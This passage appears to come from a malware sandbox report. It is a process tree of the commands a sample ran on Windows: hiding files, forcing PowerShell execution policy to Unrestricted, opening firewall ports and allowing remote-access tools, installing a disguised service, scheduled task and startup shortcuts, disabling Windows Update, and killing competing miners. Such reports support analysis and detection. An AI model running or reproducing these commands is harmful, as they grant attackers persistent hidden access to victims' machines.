                                                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe +h +r +s "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                                  PID:5020
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                                  PID:5608
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -ArgumentList 'Set-ExecutionPolicy Unrestricted' -Verb RunAs -windowstyle hidden"
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                  PID:4456
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe" Set-ExecutionPolicy Unrestricted
                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                    PID:4372
                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                        PID:3784
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" /f
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                      PID:4060
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Unrestricted" /f /reg:64
                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                        PID:1428
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Unrestricted" /f
                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                          PID:60
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 443" dir=in action=allow protocol=TCP localport=443
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:696
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 443" new enable=yes
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:3732
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 80" dir=in action=allow protocol=TCP localport=80
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:5532
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 80" new enable=yes
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:1748
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 6568" dir=in action=allow protocol=TCP localport=6568
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:5620
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 6568" new enable=yes
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:2244
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Open port 50001" dir=in action=allow protocol=TCP localport=50001
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:1484
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe advfirewall firewall set rule name="Open port 50001" new enable=yes
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          PID:2944
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe advfirewall firewall add rule name="AnyDesk1" dir=in action=allow program="C:\Program Files (x86)\AnyDesk\AnyDesk.exe" enable=yes
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:1540
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe advfirewall firewall add rule name="AnyDesk2" dir=in action=allow program="C:\Program Files\AnyDesk\AnyDesk.exe" enable=yes
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          PID:1648
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe advfirewall firewall add rule name="AnyDesk3" dir=in action=allow program="C:\ProgramData\AnyDesk\AnyDesk.exe" enable=yes
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:1664
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe advfirewall firewall add rule name="TeamViewer1" dir=in action=allow program="C:\Program Files (x86)\TeamViewer\TeamViewer.exe" enable=yes
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:5416
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe advfirewall firewall add rule name="TeamViewer2" dir=in action=allow program="C:\Program Files\TeamViewer\TeamViewer.exe" enable=yes
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:5348
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe advfirewall firewall add rule name="TeamViewer3" dir=in action=allow program="C:\ProgramData\TeamViewer\TeamViewer.exe" enable=yes
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:4064
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel1" dir=in action=allow program="C:\ProgramData\IntelSvc.exe" enable=yes
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          PID:5124
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel2" dir=in action=allow program="C:\Users\Public\IntelSvc.exe" enable=yes
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:5548
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel3" dir=in action=allow program="C:\Users\Admin\AppData\Local\OneDrive\fontdrvhots.exe" enable=yes
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:2396
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Intel4" dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\tv_x86.exe" enable=yes
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                          PID:3752
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\USOShared\*.*"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                                          PID:3372
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                          C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                                          PID:2924
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\ProgramData\IntelSvc.exe' -ArgumentList '-install_service' -verb runas -windowstyle hidden"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                          PID:4428
                                                                                                                                                                                                                                                                          • C:\ProgramData\IntelSvc.exe
                                                                                                                                                                                                                                                                            "C:\ProgramData\IntelSvc.exe" -install_service
                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                            PID:6124
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                          C:\Windows\System32\ping.exe 192.168.1.1 -n 4
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                                          PID:1956
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Intel(R) Utiliti" /v "ImagePath" /t "REG_EXPAND_SZ" /d "\"C:\ProgramData\IntelSvc.exe\" w -sid 1" /f
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Sets service image path in registry
                                                                                                                                                                                                                                                                          PID:4956
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Intel(R) Utiliti" /v "ImagePath" /t "REG_EXPAND_SZ" /d "\"C:\ProgramData\IntelSvc.exe\" w -sid 1" /f /reg:64
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Sets service image path in registry
                                                                                                                                                                                                                                                                          PID:4624
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\IntelSvc.exe"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                                          PID:5360
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\IntelSvc.exe"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                                          PID:6128
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\schtasks.exe /create /sc minute /mo 58 /tn "OneDrv" /tr "\"C:\Users\Admin\AppData\Local\OneDrive\fontdrvhots.exe\"" /f
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                          PID:4960
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe "$s=(New-Object -COM WScript.Shell).CreateShortcut('"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TeamViewer_Service.lnk"');$s.TargetPath='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.IconLocation='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.WorkingDirectory='"C:\Users\Admin\AppData\Local\Temp"';$s.WindowStyle=7;$s.Save()"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                            PID:1752
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe "$s=(New-Object -COM WScript.Shell).CreateShortcut('"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TeamViewer_Service.lnk"');$s.TargetPath='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.IconLocation='"C:\Users\Admin\AppData\Local\Temp\tv_x86.exe"';$s.WorkingDirectory='"C:\Users\Admin\AppData\Local\Temp"';$s.WindowStyle=7;$s.Save()"
                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                            • Drops startup file
                                                                                                                                                                                                                                                                            PID:968
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                            C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                            PID:1428
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo "x86" 2>NUL"
                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                              PID:60
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                                                                                                              C:\Windows\System32\find.exe /i "64"
                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                              PID:1848
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                              C:\Windows\System32\reg.exe Query "HKLM\Hardware\Description\System\CentralProcessor\0"
                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                              PID:4668
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                                                                                                              C:\Windows\System32\find.exe /i "x86"
                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                PID:4944
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                C:\Windows\System32\tasklist.exe /FI "IMAGENAME eq Sophos.exe"
                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                PID:4408
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                C:\Windows\System32\findstr.exe /i /c:"Sophos"
                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                  PID:2208
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                  C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                  PID:3476
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "& {Get-Content -Path "'C:\Users\Admin\AppData\Local\Temp\Intxt1.ps1'" | Out-File -FilePath "'C:\Users\Admin\AppData\Local\Temp\Intxt2.ps1'" -Encoding ascii}" -Wait
                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                  PID:752
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Intxt2.ps1"
                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                  PID:1484
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                  C:\Windows\System32\findstr.exe /i /b /v /c:"Name" /c:"----" "C:\Users\Admin\AppData\Local\Temp\Intxt1.txt"
                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                    PID:228
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo "Get-WmiObject" 2>NUL"
                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                      PID:872
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\findstr.exe /i /c:"#"
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                        PID:5556
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c C:\Windows\System32\wbem\WMIC.exe process where "name like '%Get-WmiObject%'" get ExecutablePath,status /format:csv
                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                          PID:5468
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe process where "name like '%Get-WmiObject%'" get ExecutablePath,status /format:csv
                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                              PID:4616
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c DIR /s "C:\Get-WmiObject*.exe" /B /O:D
                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                              PID:5684
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                              C:\Windows\System32\wbem\WMIC.exe process where "name like '%RtkAudio%'" Call Terminate
                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                              • Kills process with WMI
                                                                                                                                                                                                                                                                                              PID:4828
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                              C:\Windows\System32\wbem\WMIC.exe process where "name like '%Xmrig%'" Call Terminate
                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                              • Kills process with WMI
                                                                                                                                                                                                                                                                                              PID:4588
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                              C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /f /reg:64
                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                PID:3384
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d "1" /f /reg:64
                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                  PID:4224
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\netsh.exe stop "Windows Update"
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                  PID:2528
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\SC.exe config "Windows Update" start= disabled
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                                                                                  PID:4472
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\netsh.exe stop "Service Network"
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                                                  PID:4584
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\netsh.exe stop "ServiceNetwork"
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                                                  PID:3832
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\netsh.exe stop "App System"
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                                                  PID:1660
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\netsh.exe stop "System"
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                  PID:5436
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\netsh.exe stop "loadhost Service"
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                                                  PID:388
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\netsh.exe stop "loadhost Dhcp"
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                                                  PID:1400
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\netsh.exe stop "loadhostDhcp"
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                                                  PID:4572
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\SC.exe DELETE "Service Network"
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                                                                                  PID:5920
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\SC.exe DELETE "ServiceNetwork"
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                                                                                  PID:1020
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\SC.exe DELETE "App System"
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                                                                                  PID:3268
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\SC.exe DELETE "System"
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                                                                                  PID:396
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\SC.exe DELETE "loadhost Service"
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                                                                                  PID:3368
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\SC.exe DELETE "loadhost Dhcp"
                                                                                                                                                                                                                                                                                                  8⤵
